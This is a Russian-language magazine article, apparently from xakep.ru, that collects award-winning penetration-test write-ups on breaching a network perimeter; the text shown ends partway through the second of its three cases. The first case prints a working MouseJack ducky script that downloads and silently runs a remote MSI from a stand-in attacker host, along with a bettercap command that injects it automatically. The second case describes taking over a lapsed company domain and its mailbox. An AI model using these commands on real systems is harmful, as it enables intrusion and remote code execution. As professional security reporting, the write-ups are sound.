Пробив периметра. Три райтапа — победителя Pentest Award в номинации «Пробив»

Содержание статьи

• Четвертое место: «Взлом завода с телефона»
• Выводы
• Третье место: «Пробив одного из крупнейших банков через мобильное приложение»
• Развитие атаки
• Вывод
• Второе место: «Доступ к объекту внутренней сети с использованием NTLM Relay»
• CVE-2022-27228
• Принуждение к аутентификации
• NTLM Relay
• Проведение атаки
• Недостатки и рекомендации по их устранению
• Вывод

В августе 2023 года прош­ла церемо­ния наг­ражде­ния Pentest Award — пре­мии для спе­циалис­тов по тес­тирова­нию на про­ник­новение. Мы опуб­лику­ем луч­шие работы из каж­дой номина­ции и нач­нем с про­бива перимет­ра.

Ком­пания Awillix учре­дила пре­мию, что­бы этич­ные хакеры смог­ли гром­ко заявить о себе и рас­ска­зать о сво­их дос­тижени­ях. Для учас­тия спе­циалис­ты оставля­ли заяв­ки с рас­ска­зом о сво­ем луч­шем про­екте, где боль­ше все­го про­яви­ли сме­кал­ку, про­фес­сиона­лизм и кре­атив.

В этой статье соб­раны рай­тапы, заняв­шие чет­вертое, третье и вто­рое мес­та в номина­ции «Про­бив», а сле­дом отдель­ной пуб­ликаци­ей вый­дет работа, взяв­шая пер­вое мес­то.

Четвертое место: «Взлом завода с телефона»

• Ав­тор: s0i37

В 2020 году я учас­тво­вал в ком­плексном ауди­те бес­про­вод­ных сетей на стро­гом режим­ном заводе. Мне уда­лось про­бить периметр прос­тым и ори­гиналь­ным спо­собом. Дос­туп к рабоче­му компь­юте­ру сот­рудни­ка был получен пря­мо с ули­цы, по модели внеш­него наруши­теля и с исполь­зовани­ем мобиль­ного телефо­на.

На экра­не телефо­на мож­но видеть шелл, откры­тый на компь­юте­ре сот­рудни­ка, и приг­лашение во внут­реннюю сеть завода. Этот кейс на 100% демонс­три­рует реаль­ность ата­ки внеш­ним наруши­телем.

В осно­ве ата­ки — уяз­вимость MouseJack, которая поз­воля­ет уда­лен­но вво­дить текст через уяз­вимые адап­теры бес­про­вод­ных мышек.

Для экс­плу­ата­ции на под­вержен­ном ПК была наб­рана коман­да из сле­дующе­го ducky-скет­ча:

GUI r
DELAY 300
STRING msiexec /i https://en.mousejack.attacker.tk/1.msi /quiet
DELAY 300
ENTER
DELAY 300
GUI SPACE
DELAY 300
GUI r
DELAY 300
STRING msiexec /i https://ru.mousejack.attacker.tk/1.msi /quiet
DELAY 300
ENTER


Эта коман­да работа­ет на любой Windows, даже ста­рой, име­ет минималь­ную дли­ну и за одно дей­ствие ска­чива­ет и запус­кает ука­зан­ный исполня­емый файл по HTTP.

Для реаль­ного про­бива перимет­ра потен­циаль­ному зло­умыш­ленни­ку тре­бова­лось лишь нем­ного нас­тро­ить телефон. Нуж­на авто­мати­чес­кая отправ­ка вре­донос­ных нажатий на каж­дую вновь най­ден­ную бес­про­вод­ную мыш­ку или кла­виату­ру. Это мож­но сде­лать такой коман­дой:

sudo bettercap -eval "hid.recon on; events.on hid.device.new "hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt;"" 2> /dev/null


Те­перь ата­кующий может убрать телефон в кар­ман и неп­римет­но про­гули­вать­ся вдоль перимет­ра, пока ему на вир­туал­ку при­лета­ют шел­лы.

Выводы

Поз­же ана­логич­ным обра­зом мы про­бива­ли перимет­ры очень круп­ных и извес­тных ИТ‑ком­паний. И каж­дый раз это мог быть внеш­ний наруши­тель, ничем не выделя­ющий­ся из тол­пы.

Уяз­вимость работа­ет по ради­ока­налу, а это нак­ладыва­ет некото­рые огра­ниче­ния на ради­ус дей­ствия. Ата­ковать цели выше вто­рого эта­жа слож­но. Цели, находя­щиеся выше, мож­но ата­ковать с помощью дро­на с прик­реплен­ным к нему Raspberry Pi Zero и Crazyradio.

Эта уяз­вимость, най­ден­ная еще в 2016 году, по‑преж­нему акту­аль­на, так как име­ет аппа­рат­ную при­роду. По моему мне­нию, это самая опас­ная из всех физичес­ких уяз­вимос­тей сегод­ня, пос­коль­ку она сра­зу же дает RCE на под­вержен­ных устрой­ствах, экс­плу­ати­рует­ся за секун­ду и нес­ложна в экс­плу­ата­ции.

Бо­лее под­робно я писал о ней в стать­ях «Ки­бер­фон. Прев­раща­ем телефон на Android в инс­тру­мент хакера» и «Ме­гад­рон. Стро­им хакер­ский бес­пилот­ник — даль­нобой­ный и с защитой от глу­шилок».

Третье место: «Пробив одного из крупнейших банков через мобильное приложение»

• Ав­тор: WizaXxX

Это крат­кая исто­рия о пен­тесте, который мы про­води­ли по заказу одно­го из круп­ных бан­ков. Точ­кой вхо­да ста­ло мобиль­ное при­ложе­ние для биз­неса.

Мы замети­ли, что домен для поч­ты в при­ложе­нии не сов­пада­ет с тем, который ука­зан на сай­те. Он вел на адрес в зоне .com, тог­да как сайт находит­ся в зоне .ru.

На глав­ной стра­нице домена из рос­сий­ско­го сег­мента видим такое сооб­щение:

Оно говорит нам о том, что домен нап­равлен на сайт, соз­данный при помощи конс­трук­тора Tilda. Регис­три­руем­ся в «Тиль­де», покупа­ем самый дешевый тариф и при­вязы­ваем этот домен к сво­ему сай­ту.

Смот­рим, где хос­тится поч­та. Пишем dig somesecret.com MX и узна­ём, что это Яндекс:

somesecret.com. 86400 IN MX 10 mx.yandex.net.


Те­перь идем в Яндекс, говорим, что мы вла­делец домена, и под­твержда­ем вла­дение через тег на глав­ной стра­нице.

В раз­деле «Кон­такты» наш­лись пре­дыду­щие вла­дель­цы элек­трон­ной поч­ты.

Преж­ний вла­делец пытал­ся вос­ста­новить пароль на сер­висе intercom.io.

Та­ким обра­зом мы обна­ружи­ли всех зарегис­три­рован­ных поль­зовате­лей и получи­ли спи­сок ком­паний‑пар­тне­ров.

Даль­ше мы написа­ли прос­той пар­сер сооб­щений, который искал чувс­тви­тель­ные дан­ные. Слож­но было за что‑то зацепить­ся сре­ди тысячи перепи­сок. В одной из них наш­лась поч­та, отличная от домена. Да, опять!

До­мен уже дру­гой и рас­положен в зоне .io.

Мы запус­тили брут под­доменов и наш­ли IP-адре­са, которые ведут в облачные сер­висы.

Развитие атаки

При перебо­ре дирек­торий на одном из най­ден­ных сер­веров мы наш­ли каталог /auth/, отоб­ража­ющий фор­му вхо­да в «1С:Пред­при­ятие».

Источник: xakep.ru